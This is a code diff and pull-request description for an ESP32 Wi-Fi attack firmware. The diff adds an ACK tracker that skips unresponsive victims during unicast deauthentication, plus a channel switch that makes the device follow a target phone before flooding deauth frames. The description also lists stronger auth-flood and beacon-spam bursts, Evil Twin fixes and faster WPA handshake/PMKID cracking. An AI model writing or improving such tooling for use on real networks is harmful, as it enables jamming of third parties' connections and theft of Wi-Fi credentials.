 {
-    wifi_scan_config_t scan_config = {
-        .ssid = NULL,
-        .bssid = NULL,
-        .channel = 0,
-        .show_hidden = false,
-        .scan_type = WIFI_SCAN_TYPE_ACTIVE,
-        .scan_time.active.min = 50,
-        .scan_time.active.max = 150,
-        .home_chan_dwell_time = 100,
-    };
-
-    ws_frame_req_t cmd;
-    cmd.hd = req->hd;
-    cmd.fd = req->fd;
-    cmd.frame_type = WS_TX_FRAME;
-
-    esp_err_t err = esp_wifi_scan_start(&scan_config, true);
-    if (err != ESP_OK) {
-        api_send_status_frame(req, "error", "Failed to start scan");
-        return err;
+    esp_err_t ret = wifi_sniffer_scan_fill_aps();
+    
+    if (ret != ESP_OK) {
+        api_send_status_frame(req, "error", "Failed to perform WiFi scan");
+        return ret;
     }
 
-    uint16_t ap_count = 0;
-    err = esp_wifi_scan_get_ap_num(&ap_count);
-    if (err != ESP_OK) {
-        api_send_status_frame(req, "error", "Failed to get AP count");
-        return err;
+    aps_info_t *scan_results = (aps_info_t *)malloc(sizeof(aps_info_t));
+    if (!scan_results) {
+        ESP_LOGE(TAG, "No Heap memory for scan results!");
+        return ESP_ERR_NO_MEM;
     }
 
-    wifi_ap_record_t *ap_records = NULL;
-    if (ap_count > 0) {
-        ap_records = (wifi_ap_record_t *)calloc(ap_count, sizeof(wifi_ap_record_t));
-        if (!ap_records) {
-            api_send_status_frame(req, "error", "Out of memory");
-            return ESP_ERR_NO_MEM;
-        }
+    if(wifi_sniffer_get_aps(scan_results) != ESP_OK) {
+        api_send_status_frame(req, "error", "Failed to get scan results");
+        free(scan_results);
+        return ESP_FAIL;
+    }
 
-        err = esp_wifi_scan_get_ap_records(&ap_count, ap_records);
-        if (err != ESP_OK) {
-            free(ap_records);
-            api_send_status_frame(req, "error", "Failed to get AP records");
-            return err;
-        }
+    if(scan_results->count == 0) {
+        api_send_status_frame(req, "ok", "No APs found");
+        free(scan_results);
+        return ESP_OK;
     }
 
     cJSON *response_obj = cJSON_CreateObject();
@@ -476,59 +456,58 @@ static esp_err_t api_wifi_scan(ws_frame_req_t *req)
 
     cJSON *root = cJSON_CreateArray();
     if (!root) {
-        free(ap_records);
+        free(scan_results);
         api_send_status_frame(req, "error", "cJSON_CreateArray failed");
         return ESP_ERR_NO_MEM;
     }
 
-    for (int i = 0; i < ap_count; i++) {
+    for (int i = 0; i < scan_results->count; i++) 
+    {
         char ssid[33];
-        memcpy(ssid, ap_records[i].ssid, sizeof(ap_records[i].ssid));
+        memcpy(ssid, scan_results->ap[i].record.ssid, sizeof(scan_results->ap[i].record.ssid));
         ssid[32] = '\0';
-
         char bssid[18];
-        snprintf(bssid, sizeof(bssid),
-                 "%02X:%02X:%02X:%02X:%02X:%02X",
-                 ap_records[i].bssid[0], ap_records[i].bssid[1], ap_records[i].bssid[2],
-                 ap_records[i].bssid[3], ap_records[i].bssid[4], ap_records[i].bssid[5]);
-
+        snprintf(bssid, sizeof(bssid), MACSTRCAPS, MAC2STR(scan_results->ap[i].record.bssid));
+        
         cJSON *obj = cJSON_CreateObject();
         if (!obj) {
             cJSON_Delete(root);
-            free(ap_records);
+            free(scan_results);
             cJSON_Delete(response_obj);
             api_send_status_frame(req, "error", "cJSON_CreateObject failed");
             return ESP_ERR_NO_MEM;
         }
 
         cJSON_AddStringToObject(obj, "ssid", ssid);
-        cJSON_AddNumberToObject(obj, "signal", ap_records[i].rssi);
-        cJSON_AddNumberToObject(obj, "channel", ap_records[i].primary);
+        cJSON_AddNumberToObject(obj, "signal", scan_results->ap[i].record.rssi);
+        cJSON_AddNumberToObject(obj, "channel", scan_results->ap[i].record.primary);
         cJSON_AddStringToObject(obj, "bssid", bssid);
-        cJSON_AddStringToObject(obj, "authmode", authmode_to_str(ap_records[i].authmode));
-        cJSON_AddNumberToObject(obj, "authmode_code", ap_records[i].authmode);
-        cJSON_AddNumberToObject(obj, "pairwise_cipher", ap_records[i].pairwise_cipher);
-        cJSON_AddNumberToObject(obj, "group_cipher", ap_records[i].group_cipher);
-        cJSON_AddBoolToObject(obj, "wps", ap_records[i].wps ? 1 : 0);
+        cJSON_AddStringToObject(obj, "authmode", authmode_to_str(scan_results->ap[i].record.authmode));
+        cJSON_AddNumberToObject(obj, "authmode_code", scan_results->ap[i].record.authmode);
+        cJSON_AddNumberToObject(obj, "pairwise_cipher", scan_results->ap[i].record.pairwise_cipher);
+        cJSON_AddNumberToObject(obj, "group_cipher", scan_results->ap[i].record.group_cipher);
+        cJSON_AddBoolToObject(obj, "wps", scan_results->ap[i].record.wps ? 1 : 0);
         cJSON_AddItemToArray(root, obj);
     }
     cJSON_AddItemToObject(response_obj, "data", root);
 
     char *json = cJSON_PrintUnformatted(response_obj);
-    if (ap_records) free(ap_records);
+    if (scan_results) free(scan_results);
     cJSON_Delete(response_obj);
 
     if (!json) {
         return ESP_ERR_NO_MEM;
     }
 
+    ws_frame_req_t cmd;
+    cmd.hd = req->hd;
+    cmd.fd = req->fd;
     cmd.payload = json; 
     cmd.len = strlen(json);
     cmd.need_free = true;
 
-    if(ws_send_command_to_queue(&cmd) != ESP_OK) {
+    if (ws_send_command_to_queue(&cmd) != ESP_OK) {
         free(json);
-        ESP_LOGE(TAG, "Queue full");
         return ESP_FAIL;
     }
 

--- a/src/wifiMng.c
+++ b/src/wifiMng.c
@@ -5,28 +5,76 @@
 #include <esp_mac.h>
 #include <esp_event.h>
 #include <esp_log.h>
+#include <esp_timer.h>
 //#include "esp_private/wifi.h" 
 #include "config.h"
 #include "wifiMng.h"
 #include "nvs_keys.h"
 #include "utils.h"
 
+#define MAX_TRACKED_CLIENTS MAX_CLIENTS
+#define MAX_CONSECUTIVE_FAILS 10         // Dopo quanti ACK mancati lo consideriamo "sordo"
+#define BACKOFF_TIMEOUT_US    2000000    // 2 secondi di pausa prima di riprovare
 
 static const char *TAG = "WIFI_MNG";
 
 static volatile uint32_t g_tx_packets_success = 0;
 static volatile uint32_t g_tx_packets_dropped = 0;
+static client_ack_tracker_t ack_tracker[MAX_TRACKED_CLIENTS] = {0};
 /* --- PPS VARIABLES--- */
 static volatile uint32_t g_tx_pps = 0;
 static uint32_t last_tx_success_count = 0;
 static TimerHandle_t pps_timer = NULL;
 
 
-static void IRAM_ATTR wifi_80211_tx_done_cb(const esp_80211_tx_info_t *tx_info) {
-    if (tx_info->tx_status == WIFI_SEND_SUCCESS) {
+static inline void IRAM_ATTR update_ack_tracker(const uint8_t *mac, bool success) {
+    int empty_idx = -1;
+    for (int i = 0; i < MAX_TRACKED_CLIENTS; i++) {
+        // Trovato il MAC esistente
+        if (memcmp(ack_tracker[i].mac, mac, 6) == 0) {
+            if (success) {
+                ack_tracker[i].last_ack_time_us = esp_timer_get_time();
+                ack_tracker[i].fail_count = 0; // Resettiamo i fallimenti!
+            } else {
+                ack_tracker[i].fail_count++;   // Aumentiamo i fallimenti
+            }
+            return;
+        }
+        // Ci teniamo da parte il primo slot vuoto che incontriamo
+        if (empty_idx == -1 && ack_tracker[i].mac[0] == 0) {
+            empty_idx = i;
+        }
+    }
+    // Se non l'abbiamo trovato e c'è spazio, lo aggiungiamo
+    if (empty_idx != -1) {
+        memcpy(ack_tracker[empty_idx].mac, mac, 6);
+        if (success) {
+            ack_tracker[empty_idx].last_ack_time_us = esp_timer_get_time();
+            ack_tracker[empty_idx].fail_count = 0;
+        } else {
+            ack_tracker[empty_idx].fail_count = 1;
+        }
+    }
+}
+
+
+static void IRAM_ATTR wifi_80211_tx_done_cb(const esp_80211_tx_info_t *tx_info) 
+{
+    uint8_t *buffer = tx_info->data;
+    if (buffer == NULL) return;
+    bool is_unicast = (buffer[4] & 0x01) == 0;
+    
+    bool success = (tx_info->tx_status == WIFI_SEND_SUCCESS);
+
+    if (success) {
         g_tx_packets_success++;
     } else {
         g_tx_packets_dropped++;
+    }
+
+    if (is_unicast) {
+        uint8_t *dst_mac = buffer + 4;
+        update_ack_tracker(dst_mac, success);
     }
 }
 
@@ -269,6 +317,15 @@ esp_err_t wifi_set_channel_safe(uint8_t new_channel)
 
 esp_err_t wifi_set_temporary_channel(uint8_t new_channel, uint32_t window)
 {
+    uint8_t current_primary;
+    wifi_second_chan_t current_secondary;
+    esp_err_t err = esp_wifi_get_channel(&current_primary, &current_secondary);
+    
+    if (err != ESP_OK) return err;
+    if (current_primary == new_channel) {
+        return ESP_OK;
+    }
+
     wifi_roc_req_t roc_req = {
         .ifx = WIFI_IF_STA,
         .type = WIFI_ROC_REQ,
@@ -280,6 +337,41 @@ esp_err_t wifi_set_temporary_channel(uint8_t new_channel, uint32_t window)
     };
 
     return esp_wifi_remain_on_channel(&roc_req);
+}
+
+
+esp_err_t wifi_switch_ap_channel_csa(uint8_t new_channel)
+{
+    uint8_t current_primary;
+    wifi_second_chan_t current_secondary;
+    esp_err_t err = esp_wifi_get_channel(&current_primary, &current_secondary);
+    
+    if (err != ESP_OK) return err;
+    if (current_primary == new_channel) {
+        return ESP_OK;
+    }
+
+    ESP_LOGI(TAG, "Forcing SoftAP switch from CH %d to CH %d...", current_primary, new_channel);
+
+    wifi_config_t ap_config;
+    err = esp_wifi_get_config(WIFI_IF_AP, &ap_config);
+    if (err != ESP_OK) return err;
+    ap_config.ap.channel = new_channel;
+    ap_config.ap.beacon_interval = 100;
+    ap_config.ap.csa_count = 10;
+    // Applichiamo la configurazione. 
+    // Su ESP-IDF questo innesca l'aggiornamento della radio. 
+    // Sui chip più recenti genera un CSA implicito; sui più vecchi fa un salto brutale.
+    err = esp_wifi_set_config(WIFI_IF_AP, &ap_config);
+    if (err != ESP_OK) {
+        ESP_LOGE(TAG, "Failed to set new AP config: %s", esp_err_to_name(err));
+        return err;
+    }
+    // Pausa tattica: diamo tempo al telefono di accorgersi del salto 
+    // e di "inseguire" l'ESP32 sul nuovo canale prima di iniziare a inondare
+    // l'etere di pacchetti deauth (che potrebbero causare packet loss alla dashboard).
+    vTaskDelay(pdMS_TO_TICKS(5000)); 
+    return ESP_OK;
 }
 
 
@@ -318,4 +410,26 @@ void wifi_reset_frame_counters(void)
 uint32_t wifi_get_frame_pps(void) 
 {
     return g_tx_pps;
+}
+
+
+bool wifi_mng_is_client_responsive(const uint8_t *mac) 
+{
+    for (int i = 0; i < MAX_TRACKED_CLIENTS; i++) {
+        if (memcmp(ack_tracker[i].mac, mac, 6) == 0) {
+            // Se ha fallito troppe volte...
+            if (ack_tracker[i].fail_count >= MAX_CONSECUTIVE_FAILS) {
+                // ...e non è ancora passato il tempo di punizione (2 secondi)
+                if ((esp_timer_get_time() - ack_tracker[i].last_ack_time_us) < BACKOFF_TIMEOUT_US) {
+                    return false; // Il client è sordo. Evitiamo di sprecare colpi.
+                } else {
+                    // La punizione è finita, diamogli un'altra chance!
+                    ack_tracker[i].fail_count = 0; 
+                    return true;
+                }
+            }
+            return true;
+        }
+    }
+    return true;
 }


### PR DESCRIPTION
## Key Changes
### Performance & Memory Optimizations (Aircrack)
* **Native Cryptography Primitives:** Completely bypassed the generic `mbedTLS` wrappers in favor of direct hardware-optimized primitive calls from `libwpa_supplicant.a` (e.g., `hmac_md5`, `hmac_sha1`, `sha1_prf`).
* **Reduced Footprint:** Eliminated large intermediate buffers and heavy context structs. This significantly cuts down Stack RAM usage and drastically boosts handshake and PMKID verification performance to **~3 Keys/Second**.

### Deauther Enhancements
* **Smart Client Tracking (ACK Tracker):** Implemented `client_ack_tracker_t` to monitor client responsiveness via Unicast ACKs. The system now detects "deaf" or dead clients and stops spamming unicast frames, conserving TX resources.
* **Dynamic Channel Switching:** When a single target is selected, the ESP32 SoftAP now automatically aligns its channel with the target AP using an implicit Channel Switch Announcement (CSA).
* **Target Filtering:** Added a `-90 dBm` RSSI threshold to ignore distant clients during attacks.
* **Burst Tuning:** Increased loop iterations for various frame flood attacks (Auth flood, Beacon spam, etc.) to improve attack penetration.

### Evil Twin Fixes
* **Graceful Shutdown:** Introduced a FreeRTOS `EventGroup` (`evil_twin_evt`) to ensure the Evil Twin task shuts down cleanly and reliably when stopped, fixing previous hanging issues.
* **5GHz Target Detection:** Fixed the detection logic for 5GHz twin targets. The struct `twin_on_5ghz` is now correctly populated with the exact target parameters (authmode, ciphers, vendor, etc.) and tracks channel hopping efficiently.

### UI & Scanner Improvements
* **WPS Detection:** Added a dedicated column in the Live Packet Analyzer / WiFi Scanner frontend to show if WPS is enabled on the scanned networks.
* **Unified API Scanning:** Refactored the `api_wifi_scan` endpoint to utilize the centralized `wifi_sniffer_scan_fill_aps_fast` routine instead of relying on redundant raw ESP-IDF scan calls.

